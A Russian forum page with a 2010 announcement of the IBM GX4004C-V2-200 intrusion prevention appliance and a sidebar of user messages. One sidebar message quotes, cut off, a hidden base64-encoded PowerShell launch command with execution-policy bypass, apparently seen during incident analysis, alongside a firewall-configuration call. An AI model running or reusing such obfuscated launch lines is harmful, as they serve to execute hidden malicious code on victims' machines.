Перейти к содержанию
Кирилл Керценбаум

IBM Security Network Intrusion Prevention System GX4004C-V2-200 - новая модель

Recommended Posts

Кирилл Керценбаум

IBM Security Network Intrusion Prevention System GX4004C-V2-200 - новая модель программно-аппаратного комплекса IBM Security Network Intrusion Prevention System GX Series, предлагающая пропускную способность анализа до 200 Мбит/c по доступной цене

http://www-01.ibm.com/common/ssi/cgi-bin/s...num=ENUS610-079

НОВЫЕ ВОЗМОЖНОСТИ:

1. Защита каналов пропускной способностью до 200 Мбит/с на базе программно-аппаратного комплекса

2. Значительное упрощение обслуживания и новый Веб интерфейс Администратора, включающий специально разработанные Мастера для легкой настройки политик защиты информации и Веб ресурсов компании

3. Экран состояния, позволяющий следить за состоянием оборудования, системы защиты и статистики состояния каналов передачи данных одновременно со статистикой управления обновлениями и журналов событий

4. Встроенные механизмы Предотвращения утечки конфиденциальных данных (DLP), разработанные для облегчения защиты Персональных данных (ПД) сотрудников и/или клиентов компании от передачи вне защищаемого периметра

5. Интеграция с программным продуктом IBM Rational AppScan для более глубокого анализа защищенности Веб приложений

6. Полная поддержка протокола IPv6, включая управление по IPv6, отображение событий с использованием протокола IPv6, как источников в формате IPv6 , так и адресата

7. Возможность разбора инцидента с возможностью блокировки в режиме реального времени для немедленной реакции на атаки любого класса, в том числе DoS и DDoS

8. Упрощенная система управления подсистемы Виртуальных исправлений (IBM Virtual Patch Technology) для обеспечения немедленной защиты для всех ПК и серверов внутри сети, позволяющая Системным администраторам иметь большее количество времени на тестирование обновлений программного обеспечения без риска эксплуатации тех или иных уязвимостей

9. Значительные улучшение производительности и пропускной способности за счет использования новейшего аппаратного обеспечения и 64-битных технологий

* - данные нововведения также доступны во всех программно-аппаратных комплексах IBM Security Network Intrusion Prevention System GX Series с префиксом -V2, GX6116, а также GV200 и GV1000

РЕШАЕМЫЕ ЗАДАЧИ

Защита от:

- Атак на приложения

- Атак на Операционные системы

- Скрытых атак

- Атак типа "Cross-site scripting"

- Утечек конфиденциальных данных

- Атак на СУБД

- Атак типа "Denial of service (DoS)" и "Distributed Denial of Service (DDoS)"

- Закачек без ведома пользователей (Drive-by downloads)

- Внутренних угроз

- Вредоносных документов

- Вредоносных медиа файлов

- Вредоносного кода общего спектра

- Атак типа "SQL injection"

- Атак на и через Веб браузеры

- Атак на Веб сервера

Защита от и контроль:

- Пиригновых протоколов

- Туннелирования трафика

- Систем обмена Мгновенными сообщениями (ICQ, Skype и др.)

ДАТА НАЧАЛА ПРОДАЖ

19 ноября 2010 года

БОЛЕЕ ПОДРОБНО

ЛИНЕЙКА ПРОДУКТОВ IBM SECURITY NETWORK INTRUSION PREVENTION SYSTEM

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×